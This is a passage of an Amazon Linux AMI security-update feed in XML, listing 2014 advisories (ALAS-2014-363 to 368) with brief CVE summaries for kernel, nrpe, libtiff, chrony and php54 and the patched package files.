arch="i686"><filename>Packages/php55-mssql-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-soap" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-soap-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-intl" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-intl-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-cli" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-cli-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-bcmath" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-bcmath-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-imap" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-imap-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-mcrypt" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mcrypt-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-xml" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xml-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-dba" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-dba-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-mbstring" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mbstring-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-mysqlnd" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mysqlnd-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-ldap" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-ldap-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55" version="5.5.13" release="3.74.amzn1" epoch="0" 
arch="i686"><filename>Packages/php55-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-devel" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-devel-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-gmp" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gmp-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-embedded" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-embedded-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-opcache" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-opcache-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-enchant" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-enchant-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-common" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-common-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-tidy" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-tidy-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-fpm" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-fpm-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-process" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-process-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-debuginfo" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-debuginfo-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-recode" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-recode-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-pgsql" version="5.5.13" release="3.74.amzn1" 
epoch="0" arch="i686"><filename>Packages/php55-pgsql-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-pdo" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pdo-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-snmp" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-snmp-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-gd" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gd-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-xmlrpc" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xmlrpc-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-pspell" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pspell-5.5.13-3.74.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-363</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-363: medium priority package update for kernel</title><issued date="2014-06-15 16:30:00" /><updated date="2014-09-19 10:25:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3153:
The futex_requeue function in kernel/futex.c in the Linux kernel through 3.14.5 does not ensure that calls have two different futex addresses, which allows local users to gain privileges via a crafted FUTEX_REQUEUE command that facilitates unsafe waiter modification.
1103626:
CVE-2014-3153 kernel: futex: pi futexes requeue issue
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3153" title="" id="CVE-2014-3153" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel" version="3.10.42" release="52.145.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.10.42-52.145.amzn1.x86_64.rpm</filename></package><package name="perf" version="3.10.42" release="52.145.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-3.10.42-52.145.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="3.10.42" release="52.145.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-3.10.42-52.145.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.10.42" release="52.145.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.10.42-52.145.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.10.42" release="52.145.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.10.42-52.145.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.10.42" release="52.145.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.10.42-52.145.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.10.42" release="52.145.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.10.42-52.145.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.10.42" release="52.145.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.10.42-52.145.amzn1.i686.rpm</filename></package><package name="kernel" version="3.10.42" release="52.145.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.10.42-52.145.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="3.10.42" release="52.145.amzn1" epoch="0" 
arch="i686"><filename>Packages/perf-debuginfo-3.10.42-52.145.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.10.42" release="52.145.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.10.42-52.145.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.10.42" release="52.145.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.10.42-52.145.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.10.42" release="52.145.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.10.42-52.145.amzn1.i686.rpm</filename></package><package name="perf" version="3.10.42" release="52.145.amzn1" epoch="0" arch="i686"><filename>Packages/perf-3.10.42-52.145.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="3.10.42" release="52.145.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.10.42-52.145.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-364</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-364: important priority package update for nrpe</title><issued date="2014-06-26 10:29:00" /><updated date="2014-09-19 10:26:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-2913:
1089878:
CVE-2014-2913 nrpe: remote command execution when command arguments are enabled
** DISPUTED ** Incomplete blacklist vulnerability in nrpe.c in Nagios Remote Plugin Executor (NRPE) 2.15 and earlier allows remote attackers to execute arbitrary commands via a newline character in the -a option to libexec/check_nrpe. NOTE: this issue is disputed by multiple parties. It has been reported that the vendor allows newlines as "expected behavior." Also, this issue can only occur when the administrator enables the "dont_blame_nrpe" option in nrpe.conf despite the "HIGH security risk" warning within the comments.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2913" title="" id="CVE-2014-2913" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nrpe-debuginfo" version="2.15" release="2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/nrpe-debuginfo-2.15-2.7.amzn1.x86_64.rpm</filename></package><package name="nrpe" version="2.15" release="2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/nrpe-2.15-2.7.amzn1.x86_64.rpm</filename></package><package name="nagios-plugins-nrpe" version="2.15" release="2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/nagios-plugins-nrpe-2.15-2.7.amzn1.x86_64.rpm</filename></package><package name="nagios-plugins-nrpe" version="2.15" release="2.7.amzn1" epoch="0" arch="i686"><filename>Packages/nagios-plugins-nrpe-2.15-2.7.amzn1.i686.rpm</filename></package><package name="nrpe-debuginfo" version="2.15" release="2.7.amzn1" epoch="0" arch="i686"><filename>Packages/nrpe-debuginfo-2.15-2.7.amzn1.i686.rpm</filename></package><package name="nrpe" version="2.15" release="2.7.amzn1" epoch="0" arch="i686"><filename>Packages/nrpe-2.15-2.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-365</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-365: medium priority package update for libtiff</title><issued date="2014-06-26 10:31:00" /><updated date="2014-09-19 10:27:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4244:
The LZW decompressor in the gif2tiff tool in libtiff 4.0.3 and earlier allows context-dependent attackers to cause a denial of service (out-of-bounds write and crash) or possibly execute arbitrary code via a crafted GIF image.
Multiple buffer overflow flaws were found in the gif2tiff tool. An attacker could use these flaws to create a specially crafted GIF file that could cause gif2tiff to crash or, possibly, execute arbitrary code.
996468:
CVE-2013-4244 libtiff (gif2tiff): OOB Write in LZW decompressor
CVE-2013-4243:
Multiple buffer overflow flaws were found in the gif2tiff tool. An attacker could use these flaws to create a specially crafted GIF file that could cause gif2tiff to crash or, possibly, execute arbitrary code.
Heap-based buffer overflow in the readgifimage function in the gif2tiff tool in libtiff 4.0.3 and earlier allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via crafted height and width values in a GIF image.
996052:
CVE-2013-4243 libtiff (gif2tiff): possible heap-based buffer overflow in readgifimage()
CVE-2013-4232:
Use-after-free vulnerability in the t2p_readwrite_pdf_image function in tools/tiff2pdf.c in libtiff 4.0.3 allows remote attackers to cause a denial of service (crash) or possibly execute arbitrary code via a crafted TIFF image.
A heap-based buffer overflow and a use-after-free flaw were found in the tiff2pdf tool. An attacker could use these flaws to create a specially crafted TIFF file that would cause tiff2pdf to crash or, possibly, execute arbitrary code.
995975:
CVE-2013-4232 libtiff (tiff2pdf): use-after-free in t2p_readwrite_pdf_image()
CVE-2013-4231:
Multiple buffer overflows in libtiff before 4.0.3 allow remote attackers to cause a denial of service (out-of-bounds write) via a crafted (1) extension block in a GIF image or (2) GIF raster image to tools/gif2tiff.c or (3) a long filename for a TIFF image to tools/rgb2ycbcr.c. NOTE: vectors 1 and 3 are disputed by Red Hat, which states that the input cannot exceed the allocated buffer size.
Multiple buffer overflow flaws were found in the gif2tiff tool. An attacker could use these flaws to create a specially crafted GIF file that could cause gif2tiff to crash or, possibly, execute arbitrary code.
995965:
CVE-2013-4231 libtiff (gif2tiff): GIF LZW decoder missing datasize value check
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4231" title="" id="CVE-2013-4231" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4232" title="" id="CVE-2013-4232" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4243" title="" id="CVE-2013-4243" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4244" title="" id="CVE-2013-4244" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libtiff-devel" version="4.0.3" release="15.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-devel-4.0.3-15.19.amzn1.x86_64.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="15.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-static-4.0.3-15.19.amzn1.x86_64.rpm</filename></package><package name="libtiff" version="4.0.3" release="15.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-4.0.3-15.19.amzn1.x86_64.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="15.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-debuginfo-4.0.3-15.19.amzn1.x86_64.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="15.19.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-devel-4.0.3-15.19.amzn1.i686.rpm</filename></package><package name="libtiff" version="4.0.3" release="15.19.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-4.0.3-15.19.amzn1.i686.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="15.19.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-static-4.0.3-15.19.amzn1.i686.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="15.19.amzn1" epoch="0" 
arch="i686"><filename>Packages/libtiff-debuginfo-4.0.3-15.19.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-366</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-366: low priority package update for chrony</title><issued date="2014-07-09 16:20:00" /><updated date="2014-09-19 10:27:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0021:
1054790:
CVE-2014-0021 chrony: DDoS via amplification in cmdmon protocol
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0021" title="" id="CVE-2014-0021" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="chrony-debuginfo" version="1.29.1" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/chrony-debuginfo-1.29.1-1.8.amzn1.x86_64.rpm</filename></package><package name="chrony" version="1.29.1" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/chrony-1.29.1-1.8.amzn1.x86_64.rpm</filename></package><package name="chrony" version="1.29.1" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/chrony-1.29.1-1.8.amzn1.i686.rpm</filename></package><package name="chrony-debuginfo" version="1.29.1" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/chrony-debuginfo-1.29.1-1.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-367</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-367: medium priority package update for php54</title><issued date="2014-07-09 16:24:00" /><updated date="2014-09-19 10:32:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-4049:
Heap-based buffer overflow in the php_parserr function in ext/standard/dns.c in PHP 5.6.0beta4 and earlier allows remote servers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted DNS TXT record, related to the dns_get_record function.
1108447:
CVE-2014-4049 php: heap-based buffer overflow in DNS TXT record parsing
CVE-2014-3981:
acinclude.m4, as used in the configure script in PHP 5.5.13 and earlier, allows local users to overwrite arbitrary files via a symlink attack on the /tmp/phpglibccheck file.
1104978:
CVE-2014-3981 php: insecure temporary file use in the configure script
CVE-2014-3515:
CVE-2014-3487:
1107544:
CVE-2014-3487 file: cdf_read_property_info insufficient boundary check
CVE-2014-3480:
1104858:
CVE-2014-3480 file: cdf_count_chain insufficient boundary check
CVE-2014-3479:
1104869:
CVE-2014-3479 file: cdf_check_stream_offset insufficient boundary check
CVE-2014-3478:
1104863:
CVE-2014-3478 file: mconvert incorrect handling of truncated pascal string size
CVE-2014-0207:
1091842:
CVE-2014-0207 file: cdf_read_short_sector insufficient boundary check
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0207" title="" id="CVE-2014-0207" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3478" title="" id="CVE-2014-3478" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3479" title="" id="CVE-2014-3479" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3480" title="" id="CVE-2014-3480" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3487" title="" id="CVE-2014-3487" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3515" title="" id="CVE-2014-3515" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3981" title="" id="CVE-2014-3981" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4049" title="" id="CVE-2014-4049" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php54-mcrypt" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mcrypt-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-ldap" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-ldap-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-imap" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-imap-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-snmp" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-snmp-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-pdo" version="5.4.30" release="1.56.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php54-pdo-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-pspell" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pspell-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-dba" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-dba-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-embedded" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-embedded-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-bcmath" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-bcmath-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-intl" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-intl-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-common" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-common-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-xml" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xml-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-fpm" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-fpm-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-pgsql" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pgsql-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-cli" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-cli-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-process" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-process-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-soap" 
version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-soap-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-tidy" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-tidy-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-recode" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-recode-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-gd" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-gd-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-enchant" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-enchant-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-mssql" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mssql-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-debuginfo" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-debuginfo-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-mysqlnd" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysqlnd-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-odbc" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-odbc-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-devel" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-devel-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-mysql" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysql-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-mbstring" version="5.4.30" release="1.56.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php54-mbstring-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-xmlrpc" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xmlrpc-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-gd" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-gd-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-intl" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-intl-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-snmp" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-snmp-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-mysqlnd" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysqlnd-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-bcmath" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-bcmath-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-mbstring" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mbstring-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-embedded" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-embedded-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-xml" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xml-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-xmlrpc" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xmlrpc-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-debuginfo" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-debuginfo-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-pdo" version="5.4.30" 
release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pdo-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-dba" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-dba-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-tidy" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-tidy-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-imap" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-imap-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-soap" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-soap-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-enchant" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-enchant-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-devel" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-devel-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-fpm" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-fpm-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-common" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-common-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-cli" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-cli-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-mysql" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysql-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-odbc" version="5.4.30" release="1.56.amzn1" epoch="0" 
arch="i686"><filename>Packages/php54-odbc-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-ldap" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-ldap-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-pspell" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pspell-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-mssql" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mssql-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-recode" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-recode-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-mcrypt" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mcrypt-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-pgsql" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pgsql-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-process" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-process-5.4.30-1.56.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-368</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-368: medium priority package update for kernel</title><issued date="2014-07-09 16:29:00" /><updated date="2014-09-19 10:33:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-4608:
1113899:
CVE-2014-4608 kernel: lzo1x_decompress_safe() integer overflow
** DISPUTED ** Multiple integer overflows in the lzo1x_decompress_safe function in lib/lzo/lzo1x_decompress_safe.c in the LZO decompressor in the Linux kernel before 3.15.2 allow context-dependent attackers to cause a denial of service (memory corruption) via a crafted Literal Run. NOTE: the author of the LZO algorithms says "the Linux kernel is *not* affected; media hype."
CVE-2014-4508:
arch/x86/kernel/entry_32.S in the Linux kernel through 3.15.1 on 32-bit x86 platforms, when syscall auditing is enabled and the sep CPU feature flag is set, allows local users to cause a denial of service (OOPS and system crash) via an invalid syscall number, as demonstrated by number 1000.
1111590:
CVE-2014-4508 Kernel: x86_32: BUG in syscall auditing
CVE-2014-4014:
